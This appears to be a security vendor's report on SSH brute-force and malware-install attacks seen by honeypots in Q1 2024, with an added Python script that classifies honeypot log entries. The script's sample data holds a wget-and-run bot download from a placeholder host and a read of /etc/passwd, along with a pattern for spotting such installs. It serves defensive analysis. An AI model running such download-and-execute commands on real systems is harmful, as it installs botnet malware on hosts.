Statistical Report on Malware Targeting Linux SSH Servers in Q1 2024

Overview

AhnLab SEcurity intelligence Center (ASEC) uses honeypots to respond to and categorize brute force or dictionary attacks targeting poorly managed Linux SSH servers. This report will cover the status of attack sources identified in the first quarter of 2024 based on logs, as well as statistics on attacks performed by these attack sources. Furthermore, the malware used in each attack will be categorized with a summary of the statistical details.

Statistics

1. Status of Attacks on Linux SSH Servers

The following image shows statistics on attacks against Linux SSH servers identified through AhnLab’s honeypot logs in the first quarter of 2024. A notable fact about Q1 2024 is that multiple attack sources were identified, most of them installing Mirai. Also, attacks involving P2PInfect (worm malware) identified in late 2023 continue to be detected.

Figure 1. Attacks against Linux SSH servers in Q1, 2024

The “Attack source” category refers to the number of systems used in attacks by malware or threat actors: in other words, systems on which the execution of actual malware installation commands has been confirmed. ASEC honeypots collect logs related to attacks targeting poorly managed Linux SSH servers. In this context, poorly managed environments refer to environments that are vulnerable to brute force or dictionary attacks because account credentials are inadequately managed. If a login succeeds on such a system, the malware or threat actor gains control over it.

The “Attack status” category shows the number of times threat actors or malware attacked the system. Attacks on poorly managed Linux SSH servers typically begin with scanning, and most attack attempts end after the account credentials are obtained through brute force or dictionary attacks, or after the subsequent phase of collecting basic information. This report summarizes the statistical information based only on cases that go beyond this stage and have confirmed logs of malware being installed.
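The two categories above can be reproduced from honeypot logs by staging each source address the way the report describes (brute force only, credentials obtained, basic information collected, malware installation confirmed). The following is an added example, not ASEC's own tooling: it assumes OpenSSH-style auth log lines and a constructed per-session command record, with RFC 5737 documentation addresses and a placeholder download host standing in for real attack sources.

```python
import re
from collections import Counter

# Constructed sample auth log in OpenSSH format (addresses are RFC 5737 ranges).
AUTH_LOG = """\
Mar 03 10:01:02 hp sshd[2201]: Failed password for root from 203.0.113.5 port 5312 ssh2
Mar 03 10:01:04 hp sshd[2201]: Failed password for root from 203.0.113.5 port 5314 ssh2
Mar 03 10:01:07 hp sshd[2203]: Accepted password for root from 203.0.113.5 port 5316 ssh2
Mar 03 10:02:11 hp sshd[2210]: Failed password for admin from 198.51.100.7 port 40112 ssh2
Mar 03 10:02:13 hp sshd[2210]: Failed password for admin from 198.51.100.7 port 40113 ssh2
Mar 03 10:05:40 hp sshd[2230]: Accepted password for root from 192.0.2.9 port 51000 ssh2
"""

# Constructed record of commands the honeypot shell captured per accepted login.
SESSION_CMDS = {
    "203.0.113.5": ["uname -a", "cat /proc/cpuinfo",
                    "cd /tmp; wget http://MALWARE-HOST-PLACEHOLDER/bot.sh; chmod +x bot.sh; ./bot.sh"],
    "192.0.2.9": ["uname -a", "nproc", "cat /etc/passwd"],
}

LOGIN_RE = re.compile(r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
                      r"(?P<user>\S+) from (?P<src>\S+) port \d+")
# A downloader followed by marking the file executable is the install signal we count.
INSTALL_RE = re.compile(r"\b(wget|curl|tftp)\b.*\bchmod\s+\+x")


def classify_sources(auth_log, session_cmds):
    """Map each source address to its login attempt count and the stage it reached."""
    attempts, logged_in = Counter(), set()
    for m in LOGIN_RE.finditer(auth_log):
        attempts[m["src"]] += 1
        if m["result"] == "Accepted":
            logged_in.add(m["src"])
    result = {}
    for src, n in attempts.items():
        cmds = session_cmds.get(src, [])
        if src not in logged_in:
            stage = "brute_force_only"          # scanning / guessing, never got in
        elif any(INSTALL_RE.search(c) for c in cmds):
            stage = "malware_installed"         # counts as an "attack source"
        elif cmds:
            stage = "info_collection"           # logged in, only looked around
        else:
            stage = "credentials_obtained"      # logged in, ran nothing
        result[src] = {"attempts": n, "stage": stage}
    return result


def summarize(classified):
    """Attack status = total attempts; attack sources = hosts with a confirmed install."""
    return {"attack_status": sum(v["attempts"] for v in classified.values()),
            "attack_sources": sorted(s for s, v in classified.items() if v["stage"] == "malware_installed"),
            "by_stage": dict(Counter(v["stage"] for v in classified.values()))}
```

Only the last stage feeds the "Attack source" count, which is why that figure is far smaller than the number of attack attempts.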